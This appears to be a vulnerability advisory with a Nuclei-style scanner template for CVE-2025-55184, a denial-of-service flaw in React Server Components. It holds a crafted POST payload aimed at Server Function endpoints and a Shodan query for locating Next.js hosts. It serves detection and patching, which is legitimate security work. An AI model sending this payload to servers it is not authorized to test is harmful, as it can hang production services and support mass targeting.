React Server Components 19.0.0 to 19.2.1 including react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack contain an insecure deserialization vulnerability caused by unsafe payload deserialization in Server Function endpoints, letting unauthenticated attackers cause denial of service by hanging the server process.
PoC代码[已公开]
id: CVE-2025-55184
info:
name: React Server Components - Denial of Service
author: DhiyaneshDk
severity: high
description: |
React Server Components 19.0.0 to 19.2.1 including react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack contain an insecure deserialization vulnerability caused by unsafe payload deserialization in Server Function endpoints, letting unauthenticated attackers cause denial of service by hanging the server process.
impact: |
Unauthenticated attackers can cause the server to hang indefinitely, resulting in denial of service and preventing legitimate requests.
remediation: |
Update to the latest version beyond 19.2.1.
reference:
- https://vercel.com/kb/bulletin/security-bulletin-cve-2025-55184-and-cve-2025-55183#patched-versions
- https://www.facebook.com/security/advisories/cve-2025-55184
- https://react.dev/blog/2025/12/11/denial-of-service-and-source-code-exposure-in-react-server-components
metadata:
verified: true
max-request: 1
shodan-query: http.component:"Next.js"
tags: cve,cve2025,react,nextjs,react,vuln
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Accept: text/x-component
Content-Type: application/x-www-form-urlencoded
Next-Action: x
0=["$F1"]&1={"id":"x","bound":null}
redirects: true
matchers:
- type: dsl
dsl:
- "contains(content_type, 'text/plain')"
- "status_code == 404"
- 'contains(body, "Server action not found")'
condition: and
# digest: 490a0046304402202b75bfa6b03b29e3c4c5f5069098b7e1e7f21287c529501dd033431a26b826cc02207e4c94880fe6c7af1167f962b8401a20445fb27598c962b4b2ae475dd1b4481d:922c64590222798bb761d5b6d8e72950